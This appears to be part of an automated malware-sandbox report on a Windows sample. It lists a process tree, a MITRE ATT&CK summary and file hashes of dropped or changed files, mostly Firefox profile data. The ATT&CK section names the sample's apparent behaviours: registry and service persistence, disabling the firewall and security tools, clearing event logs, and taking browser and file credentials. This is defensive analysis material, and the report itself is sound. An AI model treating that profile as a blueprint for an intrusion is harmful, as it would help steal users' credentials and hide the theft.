C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:1068
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:4780
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:1040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:3704
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:4432
-
C:\Windows\System32\smartscreen.exeC:\Windows\System32\smartscreen.exe -Embedding1⤵PID:980
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1840
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:6212
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:1796
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:116
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:7116
Network
MITRE ATT&CK Enterprise v16
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
2Indicator Removal
1Clear Windows Event Logs
1Modify Registry
6Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
31KB
MD50e07b883a7ca26cc0812609afc7a7eba
SHA1d2721c6b4d8b0350b60c89a3bbe1ba582a39d244
SHA256093bbea8dfa497fa9229c131aed1ad411def246d223c5a543c48a21102897514
SHA5128d5ce6fb77bf346cee66e424fb613b920bca528518908daccf533d255eb04c2d79d1f4d9a9bfa10189ee2ca9f3dc677715dbd58b8d5e88f55cc3e7d061ff2ed1
-
Filesize
667KB
MD5af7223cf9bf7a64090d631c628eba868
SHA17a3f7927c2539bea7a877e1a966304302a093139
SHA25681a0316cd0efdad79c3f268a0e25a6e7133e9ad6ebf970fe0db36cd4e87ff849
SHA512f33a766daaaf593c22cd3dca277d4a62203280195496e2015ac1e5b7aaade0eb9af67b7f9596c206e04be2aea856b86f70d113ffb9aadeb15517e943daed410c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Filesize330B
MD53d7aabead99f8006f55d29ad5549f4b6
SHA1eb2f886aea6f59f54c263b898eb8d8fb17cd070f
SHA256010451b7bb5644ec1a54c4252b1f2fe4019082f4b6051a03cd06041ea13511bc
SHA5124dedcc3ee523ce2c6fd3303732f8166238535c888ab6a4b6ac0b4c8a64605c07d6db322d06b1eace61618ce9e43218a0c05cdddc78532234135f25259e71275c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
Filesize330B
MD5e675c656c722f9c64a956ac246d95797
SHA1cacd8e4a0b6b1e3d4f106e8871539f1b3dc5a00b
SHA256450b4f859a775b541df88980ae5921b87b941ec6507dca22a328b044a8fcd986
SHA51260ab89c6b8858b32d022ce532daf907e6cd30c600374880a846d914305421381057ea9ea04f03203d58199d89d5b529f2d485adc7d54349a0bb46b4495662755
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD59063108404ce873a63f55b85fc0279d7
SHA14f882eed1f0ba768ae3e66e22aca9f5dfac5dfb9
SHA256250e4fa65135df1df0158f86699ff4520f1fd15c61ffab22f7a4cb62198e8d01
SHA5126ec3db7405b3c0530a23904a09ea53c67253048f13d8ea2a427663e7c8269c22166eebd725917935ce9f5441c807f5ab006094fa180b84468fd8743a3b228bb8
-
Filesize
1KB
MD57376b700f02f6a95da86a04f76ee8990
SHA1ac7da7c73065a4e7adc6230926be1137e1670fba
SHA2568a444d17856bc18408c2ba87bcdb6863a3a6479e537e44d71c2be051ecfc7f1a
SHA512ec71afcccf78ec47b7f079b2e6f229109115780314b6d077bbeb852ecccdcd25aff8fc8dd543768ce55f5c9d17b62835f5e42853e849680cdc8c31ed71647bdd
-
Filesize
1KB
MD5d12bf0977e627c7b7f0a3b7592d68397
SHA1b6bb910a4a2c554d9df0de4d691ec4e5e54c36bb
SHA2568256f2f7bfc45a2c3829e2d80e064f23953dcca670fe5a86ec09c822c895dabe
SHA51201367196d606710f73ea36216d57262b4efa612fde0c55e280607076e762f85963f3584b241bc4e67cba7fd53f6a59571378ebd116e5f1a8c824082976c86c7b
-
Filesize
1KB
MD5aa01dbbc36401579da6945a9e8a72351
SHA154ed8a054cee8c8e3157d592b8c485392a3af520
SHA256a84c26ae18d442e614b068e9d8d3ad23a82529a2714b057d7dc6dd36edfb393b
SHA512680f14b0f7d114b408cd2140842eb63f292ce4b0536e5fa1e76fc2704466fcd1f986d02b57cdba2b83980e8d1106330bc48040c0f14a00d8307cef1fd4c2f082
-
Filesize
1KB
MD514ade977d5aee19d8d43a5545fb17aa4
SHA12f09f41411cd31ea761e878ef477a0a15f037823
SHA256313690a5bea10becc948a438d4197abe7d6116e1f36cc094bfe63ac4b76bc704
SHA512f7bf8a2e6a5fe5e4c60873e8e053227f7fdeb46a7336d95ae08b3aefa3e46c4310ac5185903f9854172604b1f1cdfffa7a9aeeea11464adebe6d999f46f999c9
-
Filesize
1KB
MD570e829e200994d93172199e56c369439
SHA1051915bb2944acc4de6b948913c7cfddaebd3aa2
SHA2565c09ae4bd7edd4d26fc157b2eeaf2c1dfe81dc9ff551c5f359773443de7b0d1f
SHA512b722a32b6b13a8f536743699ec13b6e2c6c8532cb2b2652d6c3b561b970e2a542f8e88b1644d91b8ace8d7ea6313ad667d0e8d3b4c6f5a51f560ded716c407fe
-
Filesize
1KB
MD5b0ddca0825b7ef13b863fa04ff940ef1
SHA13a17aa7ca0ec674144fc74b9e0de4767abd31d97
SHA256369dba1e36c0a10bb60154dd0b1756b053936aba83ab80525a5192404c16cf45
SHA5124a3207b28328c34617d488b4dbcf17f60eb340aacabddea71af45c1da1a624c4353f0617eeda5595cfc893be210be4cbf3fb57e99c55cd5819273211f2969e03
-
Filesize
1KB
MD5a5b65e48f20a79f06b30ca3020df0ce3
SHA155a2263b4bb9e5576e798d4ff0fb1e6d7bfa88cf
SHA2560cd9d3dcec93fe4ae156a9975a9c553f6adfe8be51b1a9a9f7087b7a1424fe6e
SHA51227fb7f3b0bc10dd9de982fe4f4b790aa33687af6e780ab454e87be1caf4607001cf2e5dd90a69a379364149ae30e7109ec6043298703e1f05beaf212f36e5b98
-
Filesize
1KB
MD55fbacf30b165d3cdd0e6e9fc51e21c37
SHA160d6b501b292e10a85124ff92d35c5b5687cf55d
SHA256c036a72ad57c2375f0416e53dd01704c0b19add22d298a8ee59c56982eb62cff
SHA512ed4d371fe8f9246f23eed1e651ed8dc628de8e6b638fedf2600dda93f683ee62eb90d9da4e321290ba4ff60e8c8db84f4b6c9fc067e3b7c40ef991e36f1e87c8
-
Filesize
1KB
MD53066e0895aa15bbcca5cb3f4998d2d2e
SHA1d0b8e8d1ded1dd45c15426618d61830b10f68db4
SHA256174027df389ac1ded72dba077728b00ebb7810eb60eac57018af7324b20a366f
SHA5126d8bf07ee9deaeee4d998eb7860d950f4429d20191f3c54f7f60ad2e06532cb6b5c12a34269b7bb13d56dc476977fe95a216c6233aa0e23b60c1a8653a06586f
-
Filesize
1KB
MD529d056d9bc9b4ec73b3c65ff2ab3de06
SHA1dc003908eba5553852886f062ad1c37072e2ffe1
SHA25665290526acdf94c202c88fe590659e4358495e3ad18040f6a380aae80bec3044
SHA512f24d3803b7acbbc627655ce4ea0bf3f3f8a33ce094555688e0ff09192625c068af34cb5694dc00b7f0b9ec1d00dcc060c2df03f967bc5cdb7e3b53c69c7ef326
-
Filesize
64B
MD59696642150e2968384f51a539e7b2f71
SHA179c3a5c6cbcee2735bbe5981a97ea19ab8421753
SHA2569b488bc7828983ce7607bf8f11436228919f8691db27cf4a2c76a6ca644e431f
SHA512152bbeb4074e93dfd2ca96906551885aa0f2888e95711e0e3b00de41e30f83c60f9275ead697927c12ace46a536ec86b784e5385aa6626828d4f4d33dd4471c4
-
Filesize
1KB
MD55e22dd1cda88782a1f52f76e748ef957
SHA13231826619a06fa541e2bfb21da445bd7013b5ac
SHA25673302eedcdcfa0f9639f0d00e50c19f7ff4b7bab9df431cfee38e4b94bd4ecec
SHA51275039c01812a7c0bef9fc2d0b4b8867c9acf2daf6a8ade8171d8edc7c0a2ff11488554d30397fee424922346394f14eef7518943db769c35e6916bee26f16498
-
Filesize
1KB
MD54fa5f7f2b1f477cfb3a38a71046ba532
SHA1ce63ced2d4b1bb7dd148834226022bbde551613e
SHA25683287556a9aed2744f431ba1a33cb3abf8eaf5b17bec6f9cfb241902ae0c8704
SHA51283d7748d4152a2a60b62af451f1e1719e297611d611c9731f9835992ed04cfb3f5f723890c3d0a671293adfb784b24bccc91817545f4ae228538f7e5ace0af97
-
Filesize
1KB
MD5222210a79ce2830f0250955f430c5ec9
SHA1608ed33bd7b258647be8359705a40b84b2204458
SHA256c3a3847fb06268735e00117da480bc2638b301bb765fd0e7c301fe4cad56c714
SHA5120f0b33a2be1791c17192d8b16a6614390b30088cb698f7528eeb15af7e6d0db2dcd6b97a93a4422b4eef641b717a9beea80ecc6ac8049708e5858a464c62072a
-
Filesize
1KB
MD50d0bc25e8efab5ec03821686ff475609
SHA13fdfaf2f26a6efe5793b371dcfeac03f863b0e6d
SHA2569f6801b4cc45451802eb2fcb32817b837032e366c061e88701801191dbbaef41
SHA5125a4c84c77d052093cd350e014f2b8539e386ee0eda1a28a766591e9c4e8d3c3917c85f61e0b7e5e1adf984ec8d43291ca2923af505463521b31560b97ae9b43e
-
Filesize
1KB
MD5a9d5a55646a268805a98533fe53dd0c0
SHA18e870960de2f16d5688b6d7d8d9f88507220bd8f
SHA25604f95e259d0a862c42bbf0b81e79cf760a8e223781cb4259f8ca8127d41fe488
SHA51294a9ac797018a1ca784edffa7452a66b48d46f853904e3789ac0693b6d350a0ab64c3b72e7aa0e33ab884b54c0c87ad3444b41e6fa484eb3159b97fb4424a5e8
-
Filesize
1KB
MD5ac92965ccd2fc1fe15a7d454740615ac
SHA12a90c1c1f5c88bf3aae3b5f2243a17e934f47f36
SHA256771a29292fca03a7b287437307693c1774edb67481a8ac1c6c464fe400bb8b25
SHA512867cba59e359326ba38aa66c4509ef824dbf94b44353d83c20bf47bc7127530621c2f6290631b231b4f2f5c80ff0078430e0df623e21218872512aa54a03d241
-
Filesize
1KB
MD5946bd2bcc2786b2761298f74f9994400
SHA186f2be6201550731176af29f241a97ccbcd2f8fb
SHA25640367120732eb0bef41278b0d9e05279df9a5cdb580a6b73421f48a69115e468
SHA512f211eada408281a6142969dc219d67054ed92891839eb122ecc5581d5c791b6eb2afaca8fcf0dc750ecc4f2ec4842b7990d17a9762973fe0c7c2fdd5079dfb99
-
Filesize
1KB
MD5d8d7aa0fa134f748201458c017b5682f
SHA1eab823b449a0926042f47f97039aad611aff3bc3
SHA2567f5640202e6963b46d96139c361ebb7b6949951b9bac1c771d329cad75199324
SHA5122f0b9e67c8362b536b25fd47e74a17c0693b0c0b9509cf1e70011da0d16fa70b080111fc0992884ec6e6da4a4fb7304a3b49acf88d334672c960235620078d43
-
Filesize
1KB
MD557a1c52dab4376a929d09340b6b8c6ff
SHA16f2b78b2b4388e217a7ca12e395af4c975f7103c
SHA25635b328ed1566afbf8c774c712acb747789ce10109413f2f21418fcd012bcc40e
SHA512dbb6381d65d46c4918d73bcc185001f138130b53055e2517845b21ef8cd04b894b1e214b8c9f1da21e1740b744fd0f13215e31ed535ab7ffce1a708b80d38189
-
Filesize
11KB
MD5093b5d6cb207b6978d0fe90d24c476e6
SHA1035374f61e79e4616c26c63999c5f4cf9af1b557
SHA2563488852f3eb5d65e44b35f98000a71081b9ea17350cfb6ef1f01d71cddef5736
SHA512b78a75826ab85569f30cb5289220213a3c4e570887726c74111f4aa8495ac257a7ac249fed64f2c869479410f2a098dd059ff5e8b0a3750cf8c7032183a52634
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\voxb8dut.default-release\cache2\entries\698554C633FF1DDC7613F822B0F81BC8F3CECDAA
Filesize14KB
MD5bdcabac86ed09cf27ffebb1b93466513
SHA14b7f7c41f8f0430769adcc431acde9c5b84d5f93
SHA25607830d0cd1b8f7d8d723357b5c773ad4125c14c5f4e411b8da8926f571d72ce0
SHA512f97cb951f032f84435be50c8b686fc93357992dba1c1324464f236df50d10a0f7beccc3690208fb47584575b719b67783789f0132c6aedbf4c109e730486568a
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\voxb8dut.default-release\startupCache\webext.sc.lz4
Filesize104KB
MD5f5799de70d16a3bbaa7456f89a153941
SHA157892a6bef31d7821310d7753a5d68c5965c595c
SHA256d1dfbd7a509e22b4081b350216aeba2735e56e1857b64b6f523a5eceacab8788
SHA512b77b5a97c3b21c8208caf7a4431ff5f57513325ff6f32b8d2453097da09a157e81f14382bca982f3ab1c564deb0d752ce91d72cf47807b50ad16281473c6fa32
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\voxb8dut.default-release\thumbnails\fcab4f1d5f80483c22cd2df1261e76ce.png
Filesize16KB
MD5cdd3addeec1ae691b256c029e4eba91a
SHA197463be01f67ec4e03b3d5083d6e880850440c4b
SHA256e97412741d2408441419233d143bcbb4ac342f6c0a642f271eadd4f3a640da9a
SHA5122e743936a350c4c4628ee644d5aa0c34e4576e9f5154c605c2ffdd5fd75be7f2c08a58059eb7239e1ab4faeabf1f2cb574537535bac82833c5adbb0e049c129a
-
Filesize
189B
MD50376c9b1a07ceb40fe7b7f4cf19e0e39
SHA11c690f669792b32d84ff640844a3949c4a64ed07
SHA256ce415be541d5ee8573bc5047842038b20247c77496f85b4b4406f67a54279a36
SHA512ab568a57bcf08d4dea6ab761486ff6171acbc6b34fb6bef18bb54312943a791739768e999799e74fb9c93bbb79d33c8b4aa503387c404d9ca9faa022e28dd94f
-
Filesize
187B
MD5e4a4a65f526e7ad93d1cd6b1bfcb3c58
SHA1dd288be94b80e6d660fb41062c89ae77567a58ef
SHA25604ab8e721308a2cb65ca2190e5f75d904af109f95dc668c37d6106594b00a481
SHA5125971c6d13939a3676440291a1cb0be439788634aa675267083b018f6ae05dbe35a4834b4669e21f31f455559aa84ee89b10228d35b4f0e331c8e24cb3adbf2f3
-
Filesize
4KB
MD52df9441936169e60a9631bf730cd4273
SHA1979ee79524023a77b9577d077a3472b87fda9834
SHA25624ab289fe2d2dd6e86d9862bf5dac0f6c78acc444eb083152b3eaf84e041f95e
SHA512ab1e894b85c731e9ce84e0cabbab493935bec18e352bd397cf8b3172bb817e9b174069122180d1fc2d9e538864c1cd77fd5c18ce8dd2a45434c9c045f2bf39ee
-
Filesize
1KB
MD58933185d529bc8993e2b1e22d77c5353
SHA1bcb59afaea6cf34154119c3199b46d763092ffb8
SHA256aa878747ebedf6f93e5e9fca1e76a88a83a9b4114007ab720b0d563e4cebe761
SHA51202bbd14a90610c93b9cfbaed423ed81391b13ff0de7a95312c77de468cf0052875e7efbd71a48c205830a03a00117cf19a9186d7a48c57aff4e03f9af3a08ff9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
15KB
MD556b2c3810dba2e939a8bb9fa36d3cf96
SHA199ee31cd4b0d6a4b62779da36e0eeecdd80589fc
SHA2564354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07
SHA51227812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e
-
Filesize
11KB
MD525e8156b7f7ca8dad999ee2b93a32b71
SHA1db587e9e9559b433cee57435cb97a83963659430
SHA256ddf3ba4e25a622276755133e0cce5605b83719c7cab3546e09acbfed00d6a986
SHA5121211b2fa997ba13ff926aec58b6b35a81d7fe108b0caa8f4d6369d0a37f8481373b78a4b201651243adde9e2b2699ce929482a46226ff6299b0a0e40fe2ddc56
-
Filesize
14.0MB
MD5bcceccab13375513a6e8ab48e7b63496
SHA163d8a68cf562424d3fc3be1297d83f8247e24142
SHA256a6af95a209b2e652ed6766804b9b8ad6b6a68f2c610b8f14713cd40df0d62bf9
SHA512d94483deaae98bf9212699f1ab0bd913f6151a63e65ebc1ea644ab98d5e3ebd74ecaa08f70aca31e11a5d2c64d1504b723817af35bbe9d7b05c758dd6945d484
-
Filesize
502KB
MD5e690f995973164fe425f76589b1be2d9
SHA1e947c4dad203aab37a003194dddc7980c74fa712
SHA25687862f4bc8559fbe578389a9501dc01c4c585edb4bb03b238493327296d60171
SHA51277991110c1d195616e936d27151d02e4d957be6c20a4f3b3511567868b5ddffc6abbfdc668d17672f5d681f12b20237c7905f9b0daaa6d71dcdac4b38f2448b2
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
Filesize6KB
MD593dbeb89a54decb226f2e73c59824e17
SHA1d840d24c9d064e93cd824dc236278142ae7d49eb
SHA256fff0c3cc32bc64d8c29b11d8c5551056d2da9a7d8188ea9579fa382fa5baf1cc
SHA512f457f82da35b4180196591bd7b9b729172b4e43ada9a057c7ce733e435ed07cde5481e4688a1ffe32d37c81efdfe266523f5fe78ffaabde83700587f519aff79
-
Filesize
747B
MD5e6f4fa058b02fdb5e5b94fb371e2e8c2
SHA1116207652c71e201323336292d4dcaae9da40946
SHA256c87cfa8c3c8f153bcd838a3fbeab953ff32fca6899c788c23652f4cb3265d1a7
SHA5123050929f72cee04813877e855f80ab8c828b6c35be323dd0ec8c96d715c0390870bb256fca70b54deb0da506227beb812bea73d784f036bd6745359d212761a7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\voxb8dut.default-release\datareporting\glean\db\data.safe.tmp
Filesize7KB
MD5cf28306d3f4faac4208bace84e807b1e
SHA129631d1478bfe25a7bccd22538197b9afe47398c
SHA256e9a7c645667ebcb964d71f35eef9087d42ff7e34b756c740cb1ee88f20c81957
SHA51241c69efebe934419c5b6c8172b9aa39685b9a43067de733b3d0551c0833fcb435bc5f46fea20bec11f2757ff37f051265614b050d853d2bee6cfd21b0152e66d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\voxb8dut.default-release\datareporting\glean\db\data.safe.tmp
Filesize7KB
MD58253dbaa8f3fe11a5ac8e6df6760cc87
SHA1a1ecfabfbe37a30ae9b89a80872c18e391c6ab55
SHA256e3fc86329b2186155b41b8ba2a13cd61c9ff1dfd4f81314cd2d7e848685420a3
SHA512748e1e7ba3ec5a9af90b6ae5f9091ab92002a2e8047d43203deca904a89226299640867e0ad99cdf5fb09739ed0281e70865e962339116babbd61f9de4727171
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\voxb8dut.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD5c9614db16ed0a872c278c9d7577f1d0f
SHA163066f1a98db01d1360ccba42417e3e708e0c60c
SHA256a23ff817555e85435e8bd0410f9d86cdf866de892d6ccb6622bd02e64c20ddbb
SHA512761b5f790e5126375c2330db5cbc131f23ef2e7a4855dbd0ba571f9f279dd270df93262398c6cb7a78b5d3a12d00eee5876a7c4111c19ac4571dea83b415ce0f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\voxb8dut.default-release\datareporting\glean\events\events
Filesize1KB
MD5f96812efe3611e4a604ae7d2a5143f28
SHA171f6e79f6c6614193133352bc63d44c4db4d24c8
SHA256eda6b0206d2391dc54f5e054927ae682b9bd1ae08ec52f14b6ebd804211049fe
SHA5128eb30fa9284e25fd27fd0775e52af5ed2f2db8828260ae6557ee6696d0889ef7337bf5853d56ce4ab94ee5691c3b470234acafd1aabfe0ec5f4f55f846af0fc2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\voxb8dut.default-release\datareporting\glean\pending_pings\63a68016-4732-479f-b1c4-6d6e27777188
Filesize867B
MD5f94cc7c8678eca6702a2c4162952474a
SHA1dd15d9da203883a2f2efcb64aca95c6fbade71b8
SHA256943a0caf8ac4670d2dd07ba33ba020047381a5df69c61aae05f2323857bedd2d
SHA512d291ece38c78e63f5d622468e4dc04b3dd63d833d6b4a4af118c3d767f57a8baeb63429be4d134ffffdca9a1e915980c518dbb11d0d8b0baab599df4ea36a8d4
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\voxb8dut.default-release\datareporting\glean\pending_pings\6b60b2b6-34bf-44d8-85bb-dc6aa1cc0aa0
Filesize2KB
MD5602b849421402854d3124730af176b90
SHA1c760ba27bd2998fe9f8c8a173b117d03094ba95c
SHA256792ee781170e4f2f126c7264cd7ba5787087526cc95970594988bbe2e8a363eb
SHA51293a2e74f95b279474025cbe87a5c27660214d341f211a1231f944af0b869e179e633eeec6bfa8903223953aa5b0ea89d946a0d5718cf8a2709a36cfde370de6d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\voxb8dut.default-release\datareporting\glean\pending_pings\7788a15c-5568-4ae9-95f6-c456f507be24
Filesize886B
MD50fa8c729229d4b4979ab154ba114bd2c
SHA162a965e670d3f1fbc517fc549e36c02420aa4bc4
SHA2569546b90e3c81c7fd4b103786e7f7c923c350e5fab4e8f91a49544c2fb86c172f
SHA5120621c6c91aec316b2565ebf1e5f915cbea4bc779882acc30db2b5626260d741ad0797d6b5f68d3c54b740fcb5e75b9acc3be6dc0f77524e175d58e1a3919dfe2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\voxb8dut.default-release\datareporting\glean\pending_pings\78d83bbd-42c9-4ab7-b6de-cb4c60830a1c
Filesize235B
MD5eb8eb2305895a1f30d2800a3de33ec04
SHA17b73792c6fb693d19bce767bbcfa925e0360dd3f
SHA2566ffe61730e7734b70230e616a4a4216442f36b51558a640d3181907b6c0a23db
SHA512d76cc4e01a0efb69b7be066b1184dfa0fa51ef7d4d3ad08e513856c093ffc6f38aae8e9adef1cfd4de4954c056de35138832cd9d9abd1f64b601760bc28d8dec
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\voxb8dut.default-release\datareporting\glean\pending_pings\818baab3-3662-4f96-abc5-757950118d8d
Filesize235B
MD58d666182c9d0bcebbcdd264fdcb7a402
SHA12c93952a04b3ad78ef9811fb05b1d624a60980d5
SHA256ac3c02543700cc9374ca1d30f651919ea296fd86cfbd1b76467b8280822d8389
SHA5124dd7383192486f29e0413edf86855dc5deb66f2a7819d29e463676f02cdaaea028dca2f50b07dfdf035379e203dcde569578bacf2a2a3b989beca5d9e9037375
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\voxb8dut.default-release\datareporting\glean\pending_pings\8a50ad1d-f34a-4a3c-93a8-edc47c872225
Filesize883B
MD57427ab32a53748a5613dfdd6b6212e87
SHA1243ac8e2aa1e44df0909b9eeb93946658a886a83
SHA25646d9ab3545e07586524bcd6e3077972b34bc99f55c4d0d70999ca68442693b04
SHA5124b4cf8ada57235b476dc0a2d5e3770d04e5698ed5dd494d7bb4b2577ac8035e9e1507e8a06ce75dd6cd152669125ed963914ecbefbe362078503c6f6eb0d8c20
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\voxb8dut.default-release\datareporting\glean\pending_pings\f8b3e3ec-3b77-4576-90c5-09294f2f7bb0
Filesize16KB
MD545c84c01ce9e86e85b0e937a33d1a96c
SHA10f766cda620ed5f9195c40cbffe8e82c49793cfe
SHA256b2806bb2338e6cdaa9edd3fe351cfedf547acbfd9b758b4f882237a2ed8990f4
SHA512561be9a4a3040e3907d9e1581531898909a9968c4d863fb5f58368169d048b44c31d40131f20e4a5382c88b1a96e62a3883ef27f5b62d44e93d2cde81c3f7471
-
Filesize
16KB
MD5df07914aa4835281826b6ec7ec1bf414
SHA1707db54f78ee2dceb5dd07d92107f3ba33c075a6
SHA25698e60e047fc2369ff6f08066b8aa3a119e6ceda1e9959426063f972486c1521f
SHA5124f25fc855b91949a67ff8b8e84a571641a6eacee6d6809970a2f31c35dc43449aadd4ed91195cd9c487adec05924525cd3174fb2a950c45f538a81d6048da027
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\voxb8dut.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.dll
Filesize1.1MB
MD5626073e8dcf656ac4130e3283c51cbba
SHA17e3197e5792e34a67bfef9727ce1dd7dc151284c
SHA25637c005a7789747b412d6c0a6a4c30d15732da3d857b4f94b744be1a67231b651
SHA512eebdeef5e47aeadfeebdbab8625f4ec91e15c4c4e4db4be91ea41be4a3da1e1afeed305f6470e5d6b2a31c41cbfb5548b35a15fccd7896d3fde7cdf402d7a339
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\voxb8dut.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.info
Filesize116B
MD5ae29912407dfadf0d683982d4fb57293
SHA10542053f5a6ce07dc206f69230109be4a5e25775
SHA256fe7686a6281f0ab519c32c788ce0da0d01640425018dcffcfcb81105757f6fe6
SHA5126f9083152c02f93a900cb69b1ce879e0c0d69453f1046280ca549a0301ae7925facdda6329f7ccb61726addee78ba2fffc5ba3491a185f139f3155716caf0a8d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\voxb8dut.default-release\gmp-widevinecdm\4.10.2891.0\manifest.json
Filesize1001B
MD532aeacedce82bafbcba8d1ade9e88d5a
SHA1a9b4858d2ae0b6595705634fd024f7e076426a24
SHA2564ed3c6389f6f7cd94db5cd0f870c34a296fc0de3b1e707fccf01645b455790ce
SHA51267dfe5632188714ec87f3c79dbe217a0ae4dfb784f3fac63affd20fef8b8ef1978c28b3bf7955f3daaf3004ac5316b1ffa964683b0676841bab4274c325c6e2b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\voxb8dut.default-release\gmp-widevinecdm\4.10.2891.0\widevinecdm.dll
Filesize18.5MB
MD51b32d1ec35a7ead1671efc0782b7edf0
SHA18e3274b9f2938ff2252ed74779dd6322c601a0c8
SHA2563ed0dec36754402707c2ae4fbfa887fe3089945f6f7c1a8a3e6c1e64ad1c2648
SHA512ab452caa2a529b5bf3874c291f1ffb2a30d9ea43dae5df6a6995dde4bc3506648c749317f0d8e94c31214e62f18f855d933b6d0b6b44634b01e058d3c5fcb499
-
Filesize
6KB
MD51c0976f4c3cb669e2dd50e5c857b9363
SHA1c6b7ccf9cf17d8b55091b1d8b5b61523a2779cbb
SHA256eb6ef10e4567f97d529b1d0f1609a60d9835cc21cdc8218cbaf7d4c6019a23a2
SHA512ddfaf7b77cf6df7835875f57a56673ab925cdf6a56a1960b974096c885fff8a9594c6342aff9b345fbcac3854fe6ba4c4cb6bb804b276ae05ad868ed716cd74f
-
Filesize
11KB
MD5c678a2d4f9f2f21129c3f3f941d5a9c3
SHA1f93fbd538629ae629d4ec6789531a1a80851231c
SHA256be4b5bbace383eefc6e219421d83af0a1b45a104679ef7cca3031dab7a804f92
SHA512fb2a4ef1ff4e5f38562c9cfa2a9c7723af99a28f51b0758ac39eac30895aed12698154e86ec0ff50911bff9016fccc05b4aab7e7a6ec994acdb4e6792c66d97d
-
Filesize
8KB
MD5331728f1bfb2f0c2f644e1e6d7406a0a
SHA133e93dfb2591615245e635beb1601bfbfaefa8f5
SHA25630f31b83f89af263132dea8bcf9aa2bdb9b3b10fac355ec1b5470381cc2ee74f
SHA512b1f592583c18728d272449c005ef7f5ca5853400c842cc960296f186732e216b954034e8a8fdd961ba5df671a3364ca2e7e90b7ab2b1b92db4a0471c4793a01a
-
Filesize
7KB
MD52af948500fc9164858a26ac41d4857b6
SHA1215cadf9036e8ac5b7937262ba75aaaf7d1dff00
SHA256f36748706da0d8384551303c05dbf4f6d4b1c710fb5633ce80aa078d7b134b1a
